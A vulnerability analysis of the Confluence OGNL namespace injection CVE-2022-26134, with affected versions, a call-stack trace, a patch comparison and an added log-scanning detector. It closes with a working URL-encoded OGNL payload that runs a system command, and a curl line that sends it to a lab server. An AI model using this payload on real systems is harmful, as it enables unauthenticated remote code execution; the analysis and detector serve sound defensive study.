Confluence CVE-2022-26134 Vulnerability Analysis and Reproduction
Vulnerability information
Affected versions
- 1.3.0 <= Confluence Server and Data Center < 7.4.17
- 7.13.0 <= Confluence Server and Data Center < 7.13.7
- 7.14.0 <= Confluence Server and Data Center < 7.14.3
- 7.15.0 <= Confluence Server and Data Center < 7.15.2
- 7.16.0 <= Confluence Server and Data Center < 7.16.4
- 7.17.0 <= Confluence Server and Data Center < 7.17.4
- 7.18.0 <= Confluence Server and Data Center < 7.18.1
Unaffected versions
- Confluence Server and Data Center 7.4.17
- Confluence Server and Data Center 7.13.7
- Confluence Server and Data Center 7.14.3
- Confluence Server and Data Center 7.15.2
- Confluence Server and Data Center 7.16.4
- Confluence Server and Data Center 7.17.4
- Confluence Server and Data Center 7.18.1
In our testing, Atlassian Confluence 6.7.1 is also affected.
Vulnerability analysis
Based on the call stack:
at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)
at ognl.SimpleNode.getValue(SimpleNode.java:193)
at ognl.Ognl.getValue(Ognl.java:333)
at ognl.Ognl.getValue(Ognl.java:310)
at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)
at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)
at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)
at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)
at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)
at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)
at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)
at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)
We start the analysis at com.opensymphony.webwork.dispatcher.ServletDispatcher.service.
Then follow into the getNameSpace function, which here ultimately returns /${4*4} (the namespace taken from the request path).
Next, continue into serviceAction. After processing there, execution proceeds into proxy.execute(), and from there through invoke().
invoke is then entered repeatedly in a loop. Each iteration enters a different invoke method; the most important one returns notpermitted and assigns it to resultCode.
Finally execution reaches the following code.
Continue following into execute: the parameter passed in here is the namespace that was assigned earlier.
Then it enters this point, where things become clear:
arbitrary code is finally executed here.
Summary
This vulnerability closely resembles CVE-2018-11776: it too is an OGNL injection through the namespace.
Patch comparison
Before
public void execute(ActionInvocation invocation) throws Exception {
    if (this.namespace == null)
        this.namespace = invocation.getProxy().getNamespace(); // namespace derived from the request path
    OgnlValueStack stack = ActionContext.getContext().getValueStack();
    // translateVariables evaluates any ${...} in the request-controlled namespace as OGNL
    String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
    String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);
    // ...
After
public void execute(ActionInvocation invocation) throws Exception {
    if (this.namespace == null)
        this.namespace = invocation.getProxy().getNamespace();
    // the namespace and action name are now used verbatim, without OGNL variable expansion
    String finalNamespace = this.namespace;
    String finalActionName = this.actionName;
    // ...
At the same time, Atlassian also added SafeExpressionUtil.class, which filters unsafe expressions and checks them when findValue runs.
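As an added detection example (not code from the original analysis or from Atlassian), the script below models the flow traced above: the namespace is the request path up to its last '/', and the unpatched ActionChainResult expanded ${...} in it as OGNL. It scans constructed access-log lines for a ${ delimiter in the decoded namespace part of the path; the log format, client addresses and status codes are assumptions.

```python
"""Added detection example for the namespace OGNL injection analysed above.

WebWork takes the action namespace from the request path (everything before the
last '/'); the vulnerable ActionChainResult ran that namespace through
TextParseUtil.translateVariables, which evaluates ${...} as OGNL.  So: URL-decode
the request path and look for the ${ delimiter in its namespace part.
"""
import re
from urllib.parse import unquote

# Combined log format: client ip, identd, user, [timestamp], "request line", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines, not real traffic: a benign page view, a benign search whose
# ${ sits only in the query string, then a single- and a double-encoded probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jun/2022:10:01:02 +0000] "GET /display/DEV/Home HTTP/1.1" 200 5120',
    '10.0.0.5 - - [03/Jun/2022:10:01:09 +0000] "GET /dosearchsite.action?queryString=%24%7Bx%7D HTTP/1.1" 200 2048',
    '198.51.100.23 - - [03/Jun/2022:10:02:15 +0000] "GET /%24%7B4*4%7D/ HTTP/1.1" 302 0',
    '198.51.100.23 - - [03/Jun/2022:10:02:31 +0000] "GET /%2524%257B4*4%257D/ HTTP/1.1" 302 0',
]

def namespace_from_path(path: str) -> str:
    """Mirror ServletDispatcher.getNameSpace: the path up to, not including, the last '/'."""
    last_slash = path.rfind('/')
    return path[:last_slash] if last_slash > 0 else ''

def scan_access_log(lines):
    """Return (client ip, decoded namespace) for requests whose namespace carries ${."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                            # not a request line we understand
        path = m['target'].split('?', 1)[0]     # the query string never reaches getNameSpace
        ns = unquote(unquote(namespace_from_path(path)))  # decode twice: catches %25-encoding
        if '${' in ns:
            hits.append((m['ip'], ns))
    return hits

if __name__ == '__main__':
    for ip, ns in scan_access_log(SAMPLE_LOG):
        print(f'{ip} requested OGNL-bearing namespace {ns!r}')
```

Only the two probe lines are reported; the search request is not, because a ${ in the query string never becomes part of the namespace that translateVariables expanded.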
/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22whoami%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%7D/
curl -v http://192.168.44.163:8090/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22whoami%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%7D/
References
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html